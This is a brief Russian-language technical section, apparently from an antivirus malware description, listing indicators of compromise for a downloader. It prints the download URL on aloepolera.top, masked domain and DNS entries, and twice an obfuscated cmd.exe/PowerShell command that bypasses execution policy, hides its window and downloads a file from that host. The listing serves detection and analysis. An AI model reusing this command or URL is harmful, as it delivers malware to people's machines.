Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowER^S^hELl.^e^XE -^E^x^E^CutI^o^Np^OlI^cY ^bYPass^ -NOPrOFiLE^ -^W^InDOws^T^YLe^ hidD^en (^N^EW-obJ^eC^T^ s^YS^teM.^NeT.WE^BClIEN^t).do^wnLo^AdFi^Le('http://aloepolera.top/read....
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "PowER^S^hELl.^e^XE -^E^x^E^CutI^o^Np^OlI^cY ^bYPass^ -NOPrOFiLE^ -^W^InDOws^T^YLe^ hidD^en (^N^EW-obJ^eC^T^ s^YS^teM.^NeT.WE^BClIEN^t).do^wnLo^AdFi^Le('http://aloepolera.top/read....' (со скрытым окном)